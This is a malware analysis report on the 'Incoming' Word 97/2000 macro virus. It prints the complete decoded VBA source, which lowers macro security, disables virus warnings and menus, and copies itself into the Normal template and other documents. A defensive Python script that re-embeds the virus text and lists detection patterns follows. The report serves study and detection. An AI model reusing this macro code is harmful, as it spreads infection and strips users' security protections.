Malware Insights
The sample is a Word document carrying a single VBA module named "Incoming", flagged by ClamAV as Win.Trojan.Psycho-3 (whole file) and Doc.Trojan.Cash-1 (extracted macro). The module's closing comment identifies it as the Word 97/2000 macro virus "Incoming" by Psyclone X / DVC, and the decoded source matches that behaviour; the code is not obfuscated. Document_Open writes a comment holding the active document's character count into line 27 of the first module of the global Normal template, which serves as the infection marker ("' 1236" in this copy). Document_Close does the real work: it reads the Word 2000 macro security level from HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security through System.PrivateProfileString and, if present, sets it to 1 (Low) and disables the Security... item of the Tools > Macro submenu; it turns off Options.VirusProtection (the Word 97 macro virus warning), the save-Normal prompt and conversion confirmations, and disables the Tools > Macro menu entry. It then copies its own module text over the first module of the Normal template (so every document opened afterwards inherits the macro) or, if Normal is already infected, over the first module of the active document, renames the target module to "Incoming", and re-saves the active document in Word .doc format when the marker in Normal matches the document's current character count. The only payload is a message box ("Chaos, Panic, Disorder, My work here is done!!") shown when a document is infected on the 16th of the month. No network download, shell execution or Run-key write appears in the extracted code; persistence is achieved by infecting the Normal template.
Heuristics (3)
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS): the document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): a Document_Open auto-execute macro is present
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection (ClamAV) | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1894 bytes | 5572a85d807a0d5acbcd3a21e77530da2c6031288cde963499730423892e918d | Doc.Trojan.Cash-1 | unlikely |
Preview script (first 1,000 lines of the extracted script)
```vba
Attribute VB_Name = "Incoming"
Attribute VB_Base = "1Normal.Incoming"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule
yup = Word.ActiveDocument.Characters.Count: s = "'" + Str(yup)
ab.replaceline 27, s
End Sub
Private Sub Document_Close()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then: CommandBars("Macro").Controls("Security...").Enabled = 0: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.ConfirmConversions = 0
Options.SaveNormalPrompt = 0
Options.VirusProtection = 0
CommandBars("Tools").Controls("Macro").Enabled = 0
Set d = New DataObject
Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule
Set c = ActiveDocument.VBProject.VBComponents(1): Set cd = c.CodeModule
d.SetText Incoming.VBProject.VBComponents(1).CodeModule.lines(1, Incoming.VBProject.VBComponents(1).CodeModule.countoflines)
If Not a.Name = "Incoming" Then
ab.deletelines 1, ab.countoflines: ab.insertlines 1, d.GetText: a.Name = "Incoming"
ElseIf Not c.Name = "Incoming" Then
cd.deletelines 1, cd.countoflines: cd.insertlines 1, d.GetText: c.Name = "Incoming"
If Day(Now) = 16 Then: MsgBox "Chaos," & vbCr & "Panic," & vbCr & "Disorder," & vbCr & "My work here is done!!", vbOKOnly, "Incoming"
End If
yup = Word.ActiveDocument.Characters.Count: s2 = "'" + Str(yup)
If ab.lines(27, 1) = s2 Then: ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
' 1236
' Word 97/2K Incoming [ Psyclone X /DVC ]
```
The module is shown exactly as olevba decoded it (35 lines, not truncated). Counted the way the VBE numbers a code module, where the seven Attribute header lines are not part of the module text, line 27 is the "' 1236" comment: this is the infection marker that Document_Open stamps into the Normal template's first module (the document's character count, via Str, which adds the leading space) and that Document_Close compares against the active document's character count before re-saving the infected file. The final comment is the author's signature line.
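As an added example, not part of the analyzer's report and not code from the sample, the following Python script applies the same triage to the decoded module above without needing oletools at run time: it scans the VBA text for the traits that make this a self-replicating Word macro virus rather than a plain downloader macro (auto-execute handlers, CodeModule writes, NormalTemplate access, macro-security tampering, date-keyed payload) and recovers the infection marker by numbering lines the way the VBE does, skipping the Attribute header that olevba emits. The indicator names, severities and the verdict rule are my own choices rather than analyzer fields; the embedded input is the macros.bas text shown on this page.

```python
"""Static triage of a VBA module carved by olevba: flag the traits of a
self-replicating Word macro virus and recover its infection marker."""
import re

# Sample input: the decoded macros.bas shown on this page (not constructed).
SAMPLE = r"""Attribute VB_Name = "Incoming"
Attribute VB_Base = "1Normal.Incoming"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule
yup = Word.ActiveDocument.Characters.Count: s = "'" + Str(yup)
ab.replaceline 27, s
End Sub
Private Sub Document_Close()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then: CommandBars("Macro").Controls("Security...").Enabled = 0: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.ConfirmConversions = 0
Options.SaveNormalPrompt = 0
Options.VirusProtection = 0
CommandBars("Tools").Controls("Macro").Enabled = 0
Set d = New DataObject
Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule
Set c = ActiveDocument.VBProject.VBComponents(1): Set cd = c.CodeModule
d.SetText Incoming.VBProject.VBComponents(1).CodeModule.lines(1, Incoming.VBProject.VBComponents(1).CodeModule.countoflines)
If Not a.Name = "Incoming" Then
ab.deletelines 1, ab.countoflines: ab.insertlines 1, d.GetText: a.Name = "Incoming"
ElseIf Not c.Name = "Incoming" Then
cd.deletelines 1, cd.countoflines: cd.insertlines 1, d.GetText: c.Name = "Incoming"
If Day(Now) = 16 Then: MsgBox "Chaos," & vbCr & "Panic," & vbCr & "Disorder," & vbCr & "My work here is done!!", vbOKOnly, "Incoming"
End If
yup = Word.ActiveDocument.Characters.Count: s2 = "'" + Str(yup)
If ab.lines(27, 1) = s2 Then: ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
' 1236
' Word 97/2K Incoming [ Psyclone X /DVC ]
"""

# indicator -> (regex, severity, meaning); VBA is case-insensitive, so every
# pattern is matched with re.IGNORECASE. Names and severities are my own.
INDICATORS = {
    "autoexec_document_open": (r"\bSub\s+Document_Open\b", "high", "runs on open"),
    "autoexec_document_close": (r"\bSub\s+Document_Close\b", "high", "runs on close"),
    "self_replication": (r"\.CodeModule\b|\b(?:insertlines|deletelines|replaceline|addfromstring)\b", "high", "reads/writes VBA code modules"),
    "normal_template_access": (r"\bNormalTemplate\.VBProject\b", "high", "infects the global Normal template"),
    "macro_security_tamper": (r"\bOptions\.VirusProtection\b|Word\\Security", "high", "lowers or disables macro security"),
    "registry_via_profilestring": (r'PrivateProfileString\(\s*""\s*,\s*"HKEY_', "medium", "registry access via System.PrivateProfileString"),
    "ui_tamper": (r'CommandBars\("[^"]+"\)\.Controls\("[^"]+"\)\.Enabled\s*=\s*0', "medium", "disables menu items"),
    "date_trigger": (r"\bDay\(Now\)\s*=", "medium", "date-keyed payload"),
    "error_suppression": (r"\bOn Error Resume Next\b", "low", "hides run-time errors"),
    "forced_save": (r"\.SaveAs\b", "low", "re-saves the (infected) document"),
}

def scan_vba(source):
    """Map each firing indicator to its severity, meaning and the first line
    (1-based, as extracted) on which it fires; silent indicators are omitted."""
    lines = source.splitlines()
    findings = {}
    for name, (pattern, severity, meaning) in INDICATORS.items():
        rx = re.compile(pattern, re.IGNORECASE)
        for lineno, text in enumerate(lines, start=1):
            if rx.search(text):
                findings[name] = {"severity": severity, "meaning": meaning, "line": lineno}
                break
    return findings

def verdict(findings):
    """Code-module writes plus macro-security tampering is the macro-virus
    signature; high-severity hits without that pair are only suspicious."""
    if "self_replication" in findings and "macro_security_tamper" in findings:
        return "macro virus"
    if any(f["severity"] == "high" for f in findings.values()):
        return "suspicious"
    return "clean"

def infection_marker(source):
    """Return (N, text) for the module line N that replaceline stamps. Lines are
    numbered as the VBE CodeModule does: the 'Attribute VB_*' header that
    olevba includes in the decoded source is not part of the module text."""
    m = re.search(r"\breplaceline\s+(\d+)\b", source, re.IGNORECASE)
    if not m:
        return None
    n = int(m.group(1))
    module = [ln for ln in source.splitlines() if not ln.startswith("Attribute VB_")]
    return (n, module[n - 1] if n <= len(module) else None)

if __name__ == "__main__":
    found = scan_vba(SAMPLE)
    for name, f in sorted(found.items(), key=lambda kv: kv[1]["line"]):
        print(f"line {f['line']:>2} [{f['severity']}] {name}: {f['meaning']}")
    print("verdict:", verdict(found), "| infection marker:", infection_marker(SAMPLE))
```

Run against the module above, every indicator fires, the verdict is "macro virus", and the marker resolves to (27, "' 1236"), which is why Document_Close's `ab.lines(27, 1) = s2` check succeeds on a freshly opened copy of this document. To triage a live sample, replace SAMPLE with the output of `olevba --decode` on the file; because the patterns are regexes over decoded source, a macro that builds these names with Chr()/string concatenation would evade them, which is exactly what the analyzer's separate "obfuscation" field is there to catch.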